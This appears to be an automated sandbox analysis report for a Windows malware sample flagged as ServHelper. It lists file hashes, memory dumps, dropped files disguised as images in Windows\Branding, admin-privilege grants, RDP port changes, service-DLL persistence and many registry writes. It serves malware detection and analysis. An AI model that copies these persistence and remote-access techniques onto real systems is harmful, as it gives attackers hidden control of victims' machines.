SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/796-78-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\05jmqopu\CSCA0D889081A1743489B4E2093EAD758D3.TMP

MD5 65eea99fef8efb737550c3b443894c87
SHA1 5b420915206645cdffac0f88e5df2c9e92a0e2f6
SHA256 98805952a1fae22c415327830501e2b3bdbfb449769e16cb6e5a367eb95f8607
SHA512 416a90aed8107b8837abcdcef1d23684d9c836031dc2fa590108d7858716645234a557cd5a76e41e0df83590b42199db4935151464d865b914f2c6828d7b1f61

C:\Users\Admin\AppData\Local\Temp\RES32A3.tmp

MD5 391041e3fb747dc2efdedcd0af2370ad
SHA1 12c880e66405c7d4f637b01aed9180839605d375
SHA256 41d11488f50ee0c171d5a258a01e041ada8c693805c0d5eafffd914db85cc47d
SHA512 77e9d87d2a6a8e9385725785226f6b697a82e3b49838a2121141e8f6ceb3739db9e0bda15d222eb3a33596c044ee4958204680ff3eee25a38bf1b4ed3e965ac6

C:\Users\Admin\AppData\Local\Temp\05jmqopu\05jmqopu.dll

MD5 fb7c7035e271ed0d72fb1fbf83c0f6ec
SHA1 1b981c98082df7377b84f07ec6ce5ed539872f80
SHA256 b9dba969c28f809803b759e5406f87274083adf6d66bfbc98d2379b09e0905cb
SHA512 307c5d3b00af58fd4262f154637fbd173cc4a1859c16afaad39f3cb67ed4f9efabc2ecb8c10659d5f57bdfa37d2e8c7d6dd2063cb7e16b0426a42bc95afcaa42

memory/1316-82-0x00000000022E0000-0x00000000022E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9fca6b1768eba2c5d42f189123152e32
SHA1 560ec3249af6e8d82e994554475b870d32145352
SHA256 c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512 b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2

memory/1316-84-0x000000001A9F0000-0x000000001A9F1000-memory.dmp

memory/1316-85-0x000000001B460000-0x000000001B461000-memory.dmp

memory/1316-86-0x000000001B670000-0x000000001B671000-memory.dmp

memory/1480-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 213ec77f56ab0691d0b4e8546031f143
SHA1 a49d41a230c3d246d2868d071670c28ea257b2f8
SHA256 fabd8ee78b221f077fb552296220957ffc79b09493bf18c7133abb6518c800b8
SHA512 8febcb5eb55d7969d8eba98293a138cb435993390db865eb06fe6a80c2ceb9c91f1174ab957f22f7e754fcc13733ca5ad871332ab8fb590600002b19637c8905

memory/1480-94-0x000000001AC74000-0x000000001AC76000-memory.dmp

memory/1480-93-0x000000001AC70000-0x000000001AC72000-memory.dmp

memory/1480-95-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1480-97-0x000000001A9A0000-0x000000001A9A1000-memory.dmp

memory/1480-99-0x000000001AC00000-0x000000001AC01000-memory.dmp

memory/1480-100-0x0000000002320000-0x0000000002321000-memory.dmp

memory/1316-101-0x000000001AA7A000-0x000000001AA99000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 4ea69dafda7ebbc1ca647f6d1cf00955
SHA1 ed2d10c7d446830c95086ddde2b6f03f55daff95
SHA256 2b5720866d2cde6aff7e0da55e813ba71b96f366a4776889374c4f6df0ae0f59
SHA512 6b2fef4550214cc84c0b82eee46c472b2df22ac097623c906b449403bdd16973bdea061280bbb514c228cefe8f35a0bb2a19c27ff8a9a04e77fe492430a075ed

memory/1480-106-0x000000001B7E0000-0x000000001B7E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_573a45bd-b12f-4a5e-add0-1d1aa6cfa04f

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

memory/1480-119-0x000000001ABF0000-0x000000001ABF1000-memory.dmp

memory/1480-120-0x000000001AC50000-0x000000001AC51000-memory.dmp

memory/1096-121-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 213ec77f56ab0691d0b4e8546031f143
SHA1 a49d41a230c3d246d2868d071670c28ea257b2f8
SHA256 fabd8ee78b221f077fb552296220957ffc79b09493bf18c7133abb6518c800b8
SHA512 8febcb5eb55d7969d8eba98293a138cb435993390db865eb06fe6a80c2ceb9c91f1174ab957f22f7e754fcc13733ca5ad871332ab8fb590600002b19637c8905

memory/1096-127-0x000000001AA20000-0x000000001AA22000-memory.dmp

memory/1096-128-0x000000001AA24000-0x000000001AA26000-memory.dmp

memory/1096-129-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1096-131-0x000000001B6D0000-0x000000001B6D1000-memory.dmp

memory/1096-133-0x0000000002670000-0x0000000002671000-memory.dmp

memory/1096-134-0x00000000023B0000-0x00000000023B1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 e0c191ab1b3ba28db8b6c5e67f852c26
SHA1 d3b7af7db2a2692eb0427120bb2e467ce49c711f
SHA256 d667be52d1b013feddfe7d207a7880639441e7c0c6721f1e33aadec4a6c5f635
SHA512 74ead2b11d85b638d2a090543c65148cd828a41f367ce607dcb0625fc9bc6262ed7010d794508aedb9738dcfa747df57546a3ab076027e3a64afcd5bec2a1e9a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ce18943-ab59-4066-aeb2-b10edb6f9f77

MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d9bbdec-8ab1-4855-a491-8531e8811405

MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fb9f171a-bad4-450d-b222-3cfd78e062f0

MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b1d32d61-47b4-4686-9342-cd1aa78d28ec

MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cb33da80-6225-49e3-b468-e4a22a8388dc

MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd079b1-de23-4531-b9b5-a9cac42e778d

MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

memory/1836-142-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 213ec77f56ab0691d0b4e8546031f143
SHA1 a49d41a230c3d246d2868d071670c28ea257b2f8
SHA256 fabd8ee78b221f077fb552296220957ffc79b09493bf18c7133abb6518c800b8
SHA512 8febcb5eb55d7969d8eba98293a138cb435993390db865eb06fe6a80c2ceb9c91f1174ab957f22f7e754fcc13733ca5ad871332ab8fb590600002b19637c8905

memory/1836-154-0x000000001AB70000-0x000000001AB72000-memory.dmp

memory/1836-155-0x000000001AB74000-0x000000001AB76000-memory.dmp

memory/1316-156-0x000000001C8A0000-0x000000001C8A1000-memory.dmp

memory/688-157-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1396-159-0x0000000000000000-mapping.dmp

memory/1772-160-0x0000000000000000-mapping.dmp

memory/1964-161-0x0000000000000000-mapping.dmp

memory/1056-162-0x0000000000000000-mapping.dmp

memory/1672-163-0x0000000000000000-mapping.dmp

memory/1888-164-0x0000000000000000-mapping.dmp

memory/1840-165-0x0000000000000000-mapping.dmp

memory/1108-166-0x0000000000000000-mapping.dmp

memory/1600-167-0x0000000000000000-mapping.dmp

memory/336-168-0x0000000000000000-mapping.dmp

memory/1492-169-0x0000000000000000-mapping.dmp

memory/784-170-0x0000000000000000-mapping.dmp

memory/1708-171-0x0000000000000000-mapping.dmp

memory/1092-172-0x0000000000000000-mapping.dmp

memory/1552-173-0x0000000000000000-mapping.dmp

memory/1608-174-0x0000000000000000-mapping.dmp

memory/1132-175-0x0000000000000000-mapping.dmp

memory/296-176-0x0000000000000000-mapping.dmp

memory/1692-177-0x0000000000000000-mapping.dmp

memory/2012-178-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 0750828e5a80dae0280c43945332e145
SHA1 fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256 637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512 a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14

\Windows\Branding\mediasvc.png

MD5 0941efccfdbde6a619081456be071102
SHA1 4d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA256 99dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512 bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab

memory/1652-181-0x0000000000000000-mapping.dmp

memory/688-182-0x0000000000000000-mapping.dmp

memory/1620-183-0x0000000000000000-mapping.dmp

memory/1504-184-0x0000000000000000-mapping.dmp

memory/1508-185-0x0000000000000000-mapping.dmp

memory/1636-186-0x0000000000000000-mapping.dmp

memory/1492-188-0x0000000000000000-mapping.dmp

memory/1732-187-0x0000000000000000-mapping.dmp

memory/1224-189-0x0000000000000000-mapping.dmp

memory/1796-190-0x0000000000000000-mapping.dmp

memory/1096-192-0x0000000000000000-mapping.dmp

memory/1336-191-0x0000000000000000-mapping.dmp

memory/1396-193-0x0000000000000000-mapping.dmp

memory/1824-194-0x0000000000000000-mapping.dmp

memory/1688-195-0x0000000000000000-mapping.dmp

memory/1628-196-0x0000000000000000-mapping.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1628-202-0x0000000019330000-0x0000000019332000-memory.dmp

memory/1628-203-0x0000000019334000-0x0000000019336000-memory.dmp

memory/1628-233-0x000000001933A000-0x0000000019359000-memory.dmp

memory/792-234-0x0000000000000000-mapping.dmp

memory/688-235-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-22 07:10

Reported

2021-09-22 07:13

Platform

win10v20210408

Max time kernel

89s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

Signatures

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID7BD.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dcjatqss.2le.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID87C.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_di5i12c1.sp3.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID86B.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID87D.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID85A.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
